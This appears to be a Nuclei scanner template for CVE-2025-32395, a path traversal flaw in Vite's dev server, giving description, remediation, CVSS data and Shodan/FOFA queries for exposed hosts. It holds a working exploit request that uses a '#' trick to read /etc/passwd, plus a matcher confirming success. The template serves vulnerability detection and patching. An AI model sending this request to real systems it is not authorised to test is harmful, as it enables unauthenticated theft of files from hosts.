Vite - Path Traversal

id: CVE-2025-32395

info:
  name: Vite - Path Traversal
  author: ChrisJr404
  severity: medium
  description: |
     Vite versions prior to 6.2.6, 6.1.5, 6.0.15, 5.4.18, and 4.5.13 contain a file exposure vulnerability caused by improper handling of request URLs with '#' in the dev server running on Node or Bun, letting attackers access arbitrary files, exploit requires the server to be exposed to the network and running on Node or Bun.
  impact: |
    An unauthenticated attacker who can reach the Vite dev server (commonly exposed during development or in misconfigured deployments) can read arbitrary files on the host filesystem.
  remediation: |
    Update to version 6.2.6, 6.1.5, 6.0.15, 5.4.18, or 4.5.13 or later.
  reference:
    - https://github.com/vitejs/vite/security/advisories/GHSA-356w-63v5-8wf4
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32395
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
    cvss-score: 6.0
    cve-id: CVE-2025-32395
    cwe-id: CWE-200
    epss-score: 0.02848
    epss-percentile: 0.86411
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"/@vite/client"
    fofa-query: body="/@vite/client"
  tags: cve,cve2025,vite,lfi,vuln,unauth

http:
  - raw:
      - |+
        GET /@fs/{{path}}/#/../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    unsafe: true
    payloads:
      path:
        - "usr/src"
        - "app"
        - "src"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'regex("root:.*:0:0:", body)'
        condition: and
# digest: 4a0a00473045022060df088fbc0d0fb47ace4cd66f27b7a9cf472705eb387bd59445c83d6fdde55f022100d4d6743106295cd054ca052f3c2788223730c6cc6e09023d31953c84f262b593:922c64590222798bb761d5b6d8e72950